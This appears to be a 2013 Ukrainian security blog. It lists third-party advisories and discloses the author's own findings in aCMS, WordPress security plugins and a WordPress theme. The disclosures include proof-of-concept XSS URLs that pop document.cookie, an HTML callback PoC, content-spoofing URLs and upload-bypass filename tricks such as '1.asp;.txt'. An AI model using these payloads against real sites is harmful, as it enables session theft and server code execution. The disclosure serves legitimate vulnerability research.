Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Multiple XSS vulnerabilities in Cerberus FTP Server <= 5.0.5.1 (деталі)
• Actuate ‘ActuateJavaComponent’ Multiple Vulnerabilities (деталі)
• bogofilter security update (деталі)
• Multiple vulnerabilities in NetApp OnCommand System Manager (деталі)
• EMC Data Protection Advisor Information Disclosure Vulnerability (деталі)
• Cross-Site Request Forgery (CSRF) in UMI.CMS (деталі)
• Firefly MediaServer Multiple Remote DoS Vulnerabilities (деталі)
• Simple Webserver 2.3-rc1 Directory Traversal (деталі)
• Nexpose Security Console - Cross-Site Request Forgery (CSRF) (деталі)
• Nexpose Security Console - Session Hijacking (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Securimage, Newsletter та wp-FileManager. Для котрих з’явилися експлоіти. Securimage - це капча-плагін, Newsletter - це плагін для створення емайл розсилань, wp-FileManager - це плагін для управління файлами.

• WordPress Securimage 3.2.4 Cross Site Scripting (деталі)
• Wordpress Newsletter 3.2.6 Cross Site Scripting (деталі)
• WordPress wp-FileManager File Download (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Snare for Linux Password Disclosure (деталі)
• SQL Injection in b2evolution (деталі)
• Snare for Linux Cross-Site Request Forgery (деталі)
• Multiple Cross-Site Scripting (XSS) vulnerabilities in GetSimple CMS (деталі)
• Snare for Linux Cross-Site Scripting via Log Injection (деталі)
• Vulnerabilities in phpmyadmin (деталі)
• unity-firefox-extension vulnerability (деталі)
• hornbill supportworks SQL injection (деталі)
• Security Notice for CA IdentityMinder (деталі)
• Enterpriser16 LoadBalancer v7.1 - Multiple Web Vulnerabilities (деталі)

У травні, 25.05.2013, під час тестування сканерів бекдорів серед плагінів для WordPress, я виявив Full path disclosure та Security bypass уразливості в плагіні AntiVirus для WordPress. Про що вже сповістив розробника плагіна.

Це секюріті плагін для виявлення експлоітів та бекдорів в WordPress. Який не зміг виявити мій Backdoored Web Application (BWA) - еталонний тест для сканерів бекдорів.

Full path disclosure (WASC-13):

http://site/wp-content/plugins/antivirus/uninstall.php

Security bypass (WASC-31):

Даний обхід безпеки дозволяє включити php бекдор у веб сайт, що не буде знайдений цим плагіном. Всі деталі виявлення BWA даним плагіном та методи обходу описані в моїй статті про тестування сканерів бекдорів.

Вразливі AntiVirus for WordPress 1.0 та попередні версії. Версії від 1.1 до 1.3.4 все ще вразливі до Security bypass, але FPD була виправлена шляхом видалення uninstall.php в AntiVirus 1.1.

06.04.2013

У лютому, 20.02.2013, я знайшов Insufficient Authorization та Arbitrary File Uploading уразливості в aCMS. Про що вже повідомив розробникам системи.

Раніше я вже писав про уразливості в aCMS.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

04.06.2013

Insufficient Authorization (WASC-02):

Немає обмежень на доступ до менеджера файлів і менеджера зображень.

http://site/assets/js/tiny_mce/plugins/filemanager/pages/fm/index.html
http://site/assets/js/tiny_mce/plugins/imagemanager/pages/im/index.html

Arbitrary File Uploading (WASC-31):

Плагіни MCFileManager і MCImageManager для TinyMCE, що використовуються в системі, вразливі до обхідних атак при завантаженні файлів. Що призводять до виконання коду на веб серверах IIS і Apache.

http://site/assets/js/tiny_mce/plugins/filemanager/pages/fm/index.html
http://site/assets/js/tiny_mce/plugins/imagemanager/pages/im/index.html

Код виконається через завантаженні файла. Перша програма вразлива до трьох методів виконання коду: через використання символа “;” (1.asp;.txt) в імені файла (IIS), через “1.asp” в імені папки (IIS), через подвійне розширення (1.php.txt) (Apache). Друга програма вразлива до двох методів виконання коду: через використання символа “;” (1.asp;.jpg) в імені файла (IIS), через подвійне розширення (1.php.jpg) (Apache).

Вразливі aCMS 1.0 та попередні версії.

У травні, 25.05.2013, під час тестування сканерів бекдорів серед плагінів для WordPress, я виявив Full path disclosure та Security bypass уразливості в плагіні Exploit Scanner для WordPress. Про що вже сповістив розробника плагіна.

Це секюріті плагін для виявлення експлоітів та бекдорів в WordPress. Який не зміг виявити мій Backdoored Web Application (BWA) - еталонний тест для сканерів бекдорів.

Full path disclosure (WASC-13):

http://site/wp-content/plugins/exploit-scanner/exploit-scanner.php

Security bypass (WASC-31):

Даний обхід безпеки дозволяє включити php бекдор у веб сайт, що не буде знайдений цим плагіном. Всі деталі виявлення BWA різними версіями даного плагіна та методи їх обходу описані в моїй статті про тестування сканерів бекдорів.

Вразливі Exploit Scanner для WordPress 1.3.3 та попередні версії.

В даній добірці уразливості в веб додатках:

• Unauthenticated remote access to D-Link DCS cameras (деталі)
• [SQLi] vBilling for FreeSWITCH (деталі)
• Password Disclosure in D-Link IP Cameras (CVE-2012-4046) (деталі)
• Local file inclusion in RoundCube Webmail (деталі)
• Vulnerability in Python Keyring (деталі)
• Multiple Vulnerabilities in phpMyAdmin (деталі)
• SonicWall Email Security 7.4.1.x - Persistent Web Vulnerability (деталі)
• Joomla! <= 3.0.3 (remember.php) PHP Object Injection Vulnerability (деталі)
• Polycom HDX Video End Points Web Management Cross Site Scripting (XSS) vulnerability (деталі)
• Syslog Watcher Pro ‘Date’ Parameter Cross Site Scripting Vulnerability (деталі)

05.04.2013

У лютому, 20.02.2013, я знайшов Cross-Site Scripting, Content Spoofing та Information Leakage уразливості в aCMS. Про що вже повідомив розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

25.05.2013

Cross-Site Scripting (WASC-08):

Для ZeroClipboard10.swf можливі XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну.

http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Content Spoofing (WASC-12):

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

Cross-Site Scripting (WASC-08):

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flv_player.swf (з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Information Leakage (WASC-13):

http://site/assets/1

На сторінці з 404 помилкою мають місце Source Code Disclosure, Full Path Disclosure і виведення списку файлів та іншої інформації.

Вразливі aCMS 1.0 та попередні версії.

В даній добірці уразливості в веб додатках:

• RSA NetWitness Informer Cross-Site Request Forgery and Click-jacking Vulnerabilities (деталі)
• Reflected XSS in phpMyAdmin 3.5.7 (деталі)
• security advisory: AirDroid 1.0.4 beta (деталі)
• Multiple vulnerabilities in Open-Xchange (деталі)
• FortiGate FortiDB 2kB 1kC & 400B - Cross Site Vulnerability (деталі)
• Multiple Vulnerabilities in KrisonAV CMS (деталі)
• FortiWeb 4kC,3kC,1kC & VA - Cross Site Vulnerabilities (деталі)
• Multiple vulnerabilities in Sosci Survey (деталі)
• HP OpenVMS LOGIN or ACMELOGIN, Remote or Local Denial of Service (DoS) (деталі)
• Matrix42 Service Desk XSS (деталі)

У травні, 16.05.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в темі I Love It New для WordPress. Про що найближчим часом повідомлю розробникам.

Дана тема містить вразливі версії VideoJS та Audio Player. Раніше я писав про уразливості в VideoJS.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/iloveitnew/videojs/videojs/video-js.swf?readyFunction=alert(document.cookie)
http://site/wp-content/themes/iloveitnew/lib/php/assets/player.swf?playerID=%22))}catch(e){alert(document.cookie)}//

Full path disclosure (WASC-13):

FPD уразливості є в index.php та майже в усіх інших php-файлах (в папці та підпапках).

http://site/wp-content/themes/iloveitnew/

http://site/wp-content/themes/iloveitnew/videojs/video-js.php

http://site/wp-content/themes/iloveitnew/videojs/admin.php

Вразливі всі версії теми I Love It New для WordPress.